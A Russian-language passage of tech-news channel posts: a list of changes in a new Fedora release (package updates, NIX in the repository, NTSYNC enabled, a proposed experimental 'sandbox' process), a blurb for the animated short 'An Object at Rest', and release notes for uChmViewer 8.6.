• На системах с архитектурой Аarch64 обеспечен автоматический выбор файла описания оборудования DTB (Device Tree Blobs) для загрузчика UEFI, что решило проблемы с загрузкой Live-сборок Fedora на ARM-ноутбуках, поставляемых с Windows.
• В Live-сборках задействован набор скриптов livesys-scripts для настройки рабочего окружения и новые возможности инструментария Dracut для автоматического создания сохраняемого между перезагрузками оверлейного хранилища при записи образа на USB-накопители.
• Обновлены версии пакетов: GCC 16.1, LLVM 22, Ruby 4.0, Go 1.26, binutils 2.46, glibc 2.43, gdb 16.3, CMake 4.0, MariaDB 11.8, IBus 1.5.34, uutils-coreutils 0.5, nushell 0.109.2, Django 6.x, TagLib 2, Helm 4, Ansible 13, TeXLive 2025, GHC 9.10, PHP 8.5.
• Продолжена работа по переводу инфраструктуры непрерывной интеграции (dist-git CI), выполняющей пересборку RPM-пакетов после внесения изменений или обновления версий, на использование по умолчанию инструментария Packit вместо Fedora CI и Zuul.
• В репозиторий добавлен инструментарий с пакетным менеджером NIX, позволяющий устанавливать пакеты в формате NIX из коллекции nixpkgs. Пакеты можно ставить в однопользовательском (в домашний каталог пользователя) и многопользовательском (в каталог /nix) режимах.
• Включено по умолчанию использование жёстких ссылок для связывания идентичных файлов, устанавливаемых из разных пакетов в иерархию /usr. Создание жёсткой ссылки осуществляется автоматически при установке пакета обработчиком на стадии "post install".
• Прекращена поставка сборок QEMU для 32-разрядных хост-систем (i686). Изменение отражает работу проекта QEMU по удалению поддержки 32-разрядных хост-систем.
• Из состава атомарных редакций Fedora для десктоп систем удалены исполняемые файлы и библиотеки FUSE 2 (ранее данная версия была объявлена устаревшей и все пакеты переведены на использование FUSE 3). Также прекращена поддержка устаревших правил polkit, поставлявшихся в файлах с расширением pkla.
• PackageKit переключён на использование нового бэкенда DNF5, собранного с библиотекой libdnf5.
• В редакции дистрибутива с композитным менеджером MiracleWM оболочка рабочего стола nwg-shell заменена на Dank Material Shell.
• По умолчанию активирован модуль ядра NTSYNC, позволяющий существенно поднять производительность Windows-игр, запускаемых при помощи Wine. Модуль реализует символьное устройство /dev/ntsync и набор примитивов для синхронизации, применяемых в ядре Windows NT. Значительный прирост производительности достигается благодаря избавлению от накладных расходов, связанных с применением RPC в пространстве пользователя.
• В Fedora Cloud вместо отдельного раздела /boot теперь предлагается одноимённый подраздел Btrfs.
• Прекращена поставка пакета libreoffice-KF5 с компонентами для интеграции LibreOffice с Qt5, на смену которому пришёл пакет libreoffice-kf6, обеспечивающий интеграцию с Qt6.

Дополнительно можно отметить инициативу по реформированию процесса разработки Fedora, выставленную на обсуждение Джефом Спалета (Jef Spaleta), лидером проекта Fedora. Джеф предлагает создать "песочницу" для упрощения тестирования новых идей и экспериментирования с новыми технологиями в дистрибутиве, без риска снижения стабильности основного проекта.

Предполагается, что инновационные идеи по развитию дистрибутива будут развиваться бок о бок с основным дистрибутивом, и со временем могут быть интегрированы в основной состав в случае выполнения определённых условий, подтверждения ценности для проекта и наличия интереса других разработчиков. Жизненный цикл экспериментальных технологий подразумевает наличие нескольких этапов становления с рецензированием в контрольных точках, привязанных ко времени, и переходом на другой этап после достижения соответствия определённым для каждого этапа критериям.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64967

An Object at Rest (Seth Boyden)

An Object at Rest follows the life of a stone as it travels over the course of millennia, facing nature's greatest obstacle: human civilization.

#ЧтоПосмотреть #анимация

Выпуск uChmViewer 8.6, программы для просмотра файлов chm и epub

Основные изменения в новой версии:

• Навигация кнопками “следующий/предыдущий” по книгам Epub теперь использует не только TOC, но и внутренний список страниц, если он есть.
• Добавлена возможность открытия книг путем перетаскивания их на приложение.
• Инсталлятор для Windows теперь добавляет файловые ассоциации.
• Исправлена ошибка открытия книг Epub с пустым полем “title”.
• Исправлена ошибка обработки некоторых книг CHM с плохо оформленным файлом HHC.
• Исправлена ошибка обработки книг CHM, содержащих пункты индекса с множественными URL.
• Исправлена ошибка чтения кэшированного поискового индекса, приводящая к построению нового поискового индекса при повторном открытии книг.
• Исправлена ошибка открытия книг Epub, использующих относительные адреса в некоторых служебных полях.